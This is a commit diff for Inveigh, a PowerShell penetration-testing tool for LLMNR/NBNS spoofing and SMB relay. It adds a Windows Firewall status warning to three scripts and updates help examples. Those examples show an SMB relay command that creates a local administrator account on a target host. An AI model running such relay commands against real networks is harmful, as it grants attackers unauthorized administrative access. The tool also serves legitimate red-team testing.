aboutsummaryrefslogtreecommitdiff
path: root/Scripts
diff options
context:
space:
mode:
Diffstat (limited to 'Scripts')
-rw-r--r--Scripts/Inveigh-BruteForce.ps113
-rw-r--r--Scripts/Inveigh-Relay.ps115
-rw-r--r--Scripts/Inveigh.ps116
3 files changed, 42 insertions, 2 deletions
diff --git a/Scripts/Inveigh-BruteForce.ps1 b/Scripts/Inveigh-BruteForce.ps1
index 5bdc181..2fa6cfd 100644
--- a/Scripts/Inveigh-BruteForce.ps1
+++ b/Scripts/Inveigh-BruteForce.ps1
@@ -285,6 +285,13 @@ else
$inveigh.status_queue.Add("Inveigh Brute Force started at $(Get-Date -format 's')") > $null
$inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Brute Force started")]) > $null
+$firewall_status = netsh advfirewall show allprofiles state | where {$_ -match 'ON'}
+
+if($firewall_status)
+{
+ $inveigh.status_queue.Add("Windows Firewall = Enabled") > $null
+}
+
if($NBNS -eq 'Y')
{
$inveigh.status_queue.Add("NBNS Brute Force Spoofer Target = $SpooferTarget") > $null
@@ -445,6 +452,12 @@ if($inveigh.status_output)
$inveigh.status_queue.RemoveRange(0,1)
}
+ "Windows Firewall = Enabled"
+ {
+ Write-Warning($inveigh.status_queue[0])
+ $inveigh.status_queue.RemoveRange(0,1)
+ }
+
default
{
Write-Output($inveigh.status_queue[0])
diff --git a/Scripts/Inveigh-Relay.ps1 b/Scripts/Inveigh-Relay.ps1
index 70551b2..f8ce03e 100644
--- a/Scripts/Inveigh-Relay.ps1
+++ b/Scripts/Inveigh-Relay.ps1
@@ -87,7 +87,7 @@ Default = 0: (0,1,2) Enable/Disable features for better operation through extern
Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire
.EXAMPLE
-Invoke-InveighRelay -SMBRelayTarget 192.168.2.55 -SMBRelayCommand "net user Dave Spring2016 /add && net localgroup administrators Dave /add"
+Invoke-InveighRelay -SMBRelayTarget 192.168.2.55 -SMBRelayCommand "net user Dave Summer2016 /add && net localgroup administrators Dave /add"
Execute with SMB relay enabled with a command that will create a local administrator account on the SMB relay
target.
@@ -234,6 +234,13 @@ if(!$inveigh.running)
$inveigh.status_queue.Add("Inveigh Relay started at $(Get-Date -format 's')") > $null
$inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Relay started")]) > $null
+ $firewall_status = netsh advfirewall show allprofiles state | where {$_ -match 'ON'}
+
+ if($firewall_status)
+ {
+ $inveigh.status_queue.Add("Windows Firewall = Enabled") > $null
+ }
+
if($HTTP -eq 'Y')
{
$inveigh.HTTP = $true
@@ -402,6 +409,12 @@ if($inveigh.status_output)
$inveigh.status_queue.RemoveRange(0,1)
}
+ "Windows Firewall = Enabled"
+ {
+ Write-Warning($inveigh.status_queue[0])
+ $inveigh.status_queue.RemoveRange(0,1)
+ }
+
default
{
Write-Output($inveigh.status_queue[0])
diff --git a/Scripts/Inveigh.ps1 b/Scripts/Inveigh.ps1
index da0cf55..1e5ea3f 100644
--- a/Scripts/Inveigh.ps1
+++ b/Scripts/Inveigh.ps1
@@ -223,7 +223,7 @@ Invoke-Inveigh -HTTPResponse "<html><head><meta http-equiv='refresh' content='0;
Execute specifying an HTTP redirect response.
.EXAMPLE
-Invoke-Inveigh -SMBRelay y -SMBRelayTarget 192.168.2.55 -SMBRelayCommand "net user Dave Spring2016 /add && net localgroup administrators Dave /add"
+Invoke-Inveigh -SMBRelay y -SMBRelayTarget 192.168.2.55 -SMBRelayCommand "net user Dave Summer2016 /add && net localgroup administrators Dave /add"
Execute with SMB relay enabled with a command that will create a local administrator account on the SMB relay
target.
@@ -478,6 +478,14 @@ else
# Write startup messages
$inveigh.status_queue.Add("Inveigh started at $(Get-Date -format 's')") > $null
$inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh started")]) > $null
+
+$firewall_status = netsh advfirewall show allprofiles state | where {$_ -match 'ON'}
+
+if($firewall_status)
+{
+ $inveigh.status_queue.Add("Windows Firewall = Enabled") > $null
+}
+
$inveigh.status_queue.Add("Listening IP Address = $IP") > $null
$inveigh.status_queue.Add("LLMNR/NBNS Spoofer IP Address = $SpooferIP") > $null
@@ -785,6 +793,12 @@ if($SMBRelay -eq 'N')
$inveigh.status_queue.RemoveRange(0,1)
}
+ "Windows Firewall = Enabled"
+ {
+ Write-Warning($inveigh.status_queue[0])
+ $inveigh.status_queue.RemoveRange(0,1)
+ }
+
default
{
Write-Output($inveigh.status_queue[0])